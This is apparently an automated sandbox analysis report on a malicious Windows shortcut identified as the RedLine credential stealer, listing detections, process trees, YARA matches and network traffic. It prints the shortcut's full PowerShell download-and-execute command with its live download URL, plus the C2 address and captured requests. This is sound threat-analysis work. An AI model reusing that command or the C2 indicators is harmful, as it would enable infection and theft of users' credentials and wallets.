Windows Analysis Report
07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk

Overview

General Information

Sample Name: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk
Analysis ID: 796782
MD5: ef7f9739337bc657cd0a63e32e27d0a1
SHA1: bf67555a7272f24ceb57b1c49e4cf37dc17b246f
SHA256: a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c
Tags: lnk

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Found URL in windows shortcut file (LNK)
Bypasses PowerShell execution policy
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Uses known network protocols on non-standard ports
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Machine Learning detection for sample
Injects a PE file into a foreign processes
Powershell drops PE file
Yara detected Generic Downloader
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • powershell.exe (PID: 4852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\user\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhost.exe' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 1592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • svhost.exe (PID: 4768 cmdline: "C:\Users\user\AppData\Roaming\svhost.exe" MD5: D3713110654DC546BD5EDC306A6E7EFD)
      • powershell.exe (PID: 4816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 3584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • svhost.exe (PID: 5428 cmdline: C:\Users\user\AppData\Roaming\svhost.exe MD5: D3713110654DC546BD5EDC306A6E7EFD)
        • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Opgcxhsdw.exe (PID: 624 cmdline: "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe" MD5: D3713110654DC546BD5EDC306A6E7EFD)
    • powershell.exe (PID: 2432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Opgcxhsdw.exe (PID: 5216 cmdline: "C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe" MD5: D3713110654DC546BD5EDC306A6E7EFD)
    • powershell.exe (PID: 2164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 url": ["194.26.192.248:7053"], "Bot Id": "cheat"}

Source | Rule | Description | Author | Strings
07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk | SUSP_LNK_SuspiciousCommands | Detects LNK file with suspicious content | Florian Roth (Nextron Systems)
  • 0x317:$s7: -noprofile
  • 0x399:$s9: .DownloadFile(

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x178fa:$a4: get_ScannedWallets
  • 0x16758:$a5: get_ScanTelegram
  • 0x1757e:$a6: get_ScanGeckoBrowsersPaths
  • 0x1539a:$a7: <Processes>k__BackingField
  • 0x132ac:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x14cce:$a9: <ScanFTP>k__BackingField
00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security

Source | Rule | Description | Author | Strings
2.2.svhost.exe.5960000.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
2.2.svhost.exe.4222060.4.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
2.2.svhost.exe.4222060.4.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.2.svhost.exe.4222060.4.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0xe68a:$u7: RunPE
  • 0x11d41:$u8: DownloadAndEx
  • 0x7330:$pat14: , CommandLine:
  • 0x11279:$v2_1: ListOfProcesses
  • 0xe88b:$v2_2: get_ScanVPN
  • 0xe92e:$v2_2: get_ScanFTP
  • 0xf61e:$v2_2: get_ScanDiscord
  • 0x1060c:$v2_2: get_ScanSteam
  • 0x10628:$v2_2: get_ScanTelegram
  • 0x106ce:$v2_2: get_ScanScreen
  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
  • 0x11709:$v2_2: get_ScanBrowsers
  • 0x117ca:$v2_2: get_ScannedWallets
  • 0x117f0:$v2_2: get_ScanWallets
  • 0x11810:$v2_3: GetArguments
  • 0xfed9:$v2_4: VerifyUpdate
  • 0x147ea:$v2_4: VerifyUpdate
  • 0x11bca:$v2_5: VerifyScanRequest
  • 0x112c6:$v2_6: GetUpdates
  • 0x147cb:$v2_6: GetUpdates
2.2.svhost.exe.4222060.4.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x117ca:$a4: get_ScannedWallets
  • 0x10628:$a5: get_ScanTelegram
  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
  • 0xf26a:$a7: <Processes>k__BackingField
  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0xeb9e:$a9: <ScanFTP>k__BackingField

Source | Rule | Description | Author | Strings
amsi64_4852.amsi.csv | Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth (Nextron Systems)
  • 0x6a:$s3: System.Net.WebClient).DownloadFile('http

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk | ReversingLabs: Detection: 74%
Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk | Virustotal: Detection: 59%
Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk | Avira: detected
Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\AppData\Roaming\svhost.exe | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe | ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Roaming\svhost.exe | ReversingLabs: Detection: 41%
Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\svhost.exe | Joe Sandbox ML: detected
Source: 2.0.svhost.exe.d30000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen
Source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": ["194.26.192.248:7053"], "Bot Id": "cheat"}
Source: unknown | HTTPS traffic detected: 185.101.226.22:443 -> 192.168.2.4:49696 version: TLS 1.0
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h

Networking

Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 7053
Source: unknown | Network traffic detected: HTTP traffic on port 7053 -> 49697
Source: Yara match | File source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE
Source: Malware configuration extractor | URLs: 194.26.192.248:7053
Source: Joe Sandbox View | ASN Name: HOSTINET_ASES HOSTINET_ASES
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global traffic | HTTP traffic detected:
  GET /install/clean/Lcovlccdxd.exe HTTP/1.1
  Host: oiartzunirratia.eus
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
  Host: 194.26.192.248:7053
  Content-Length: 137
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
  Host: 194.26.192.248:7053
  Content-Length: 144
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
  Host: 194.26.192.248:7053
  Content-Length: 1146942
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected:
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
  Host: 194.26.192.248:7053
  Content-Length: 1146934
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
Source: unknown | HTTPS traffic detected: 185.101.226.22:443 -> 192.168.2.4:49696 version: TLS 1.0
Source: global traffic | TCP traffic: 192.168.2.4:49697 -> 194.26.192.248:7053
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 194.26.192.248
Source: svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://194.26.192.248:7053
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://194.26.192.248:7053/
Source: svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://194.26.192.248:70534
Source: powershell.exe, 00000000.00000002.381690727.000001D9F43C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svhost.exe, 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000000.00000002.378116200.000001D9EC443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.328014232.000001D9DD5E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://oiartzunirratia.eus
Source: powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: svhost.exe, 00000007.00000002.587473199.00000000032FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: svhost.exe, 00000007.00000002.587473199.0000000003303000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: powershell.exe, 00000000.00000002.328014232.000001D9DC2A1000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svhost.exe, 00000007.00000002.587473199.00000000032FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/
Source: svhost.exe, 00000007.00000002.587473199.00000000032FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/0
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/
Source: svhost.exe, 00000007.00000002.587473199.00000000032EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: svhost.exe, 00000007.00000002.587473199.0000000003261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: svhost.exe, 00000002.00000002.424099399.0000000003173000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 00000009.00000002.587061238.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Opgcxhsdw.exe, 0000000A.00000002.587414248.00000000025CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.328014232.000001D9DDB4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: svhost.exe, 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: powershell.exe, 00000000.00000002.378116200.000001D9EC443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.378116200.000001D9EC301000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.328014232.000001D9DD5D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oiartzunirratia.eus
Source: powershell.exe, 00000000.00000002.327507977.000001D9DA359000.00000004.00000020.00020000.00000000.sdmp, 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk | String found in binary or memory: https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe
Source: powershell.exe, 00000000.00000002.328014232.000001D9DC4AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe0y
Source: powershell.exe, 00000000.00000002.328014232.000001D9DD5E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oiartzunirratia.eusx
Source: svhost.exe, 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004760000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: svhost.exe, 00000002.00000002.457069212.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000002.00000002.428265959.0000000004760000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown | HTTP traffic detected:
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
  Host: 194.26.192.248:7053
  Content-Length: 137
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
  Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: oiartzunirratia.eus

                    System Summary

                    barindex
                    Source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.svhost.exe.4222060.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.svhost.exe.41dca40.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000002.00000002.428265959.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000007.00000002.580544741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000002.00000002.424099399.0000000003278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000002.00000002.428265959.0000000004197000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: svhost.exe PID: 4768, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: svhost.exe PID: 5428, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Initial file | Strings: https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\svhost.exe
                    Source: 07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk, type: SAMPLE | Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
                    Source: amsi64_4852.amsi.csv, type: OTHER | Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
                    Source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 2.2.svhost.exe.4222060.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 2.2.svhost.exe.3292bc8.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 7.2.svhost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 2.2.svhost.exe.56e0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-28
                    Source: 2.2.svhost.exe.3292bc8.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
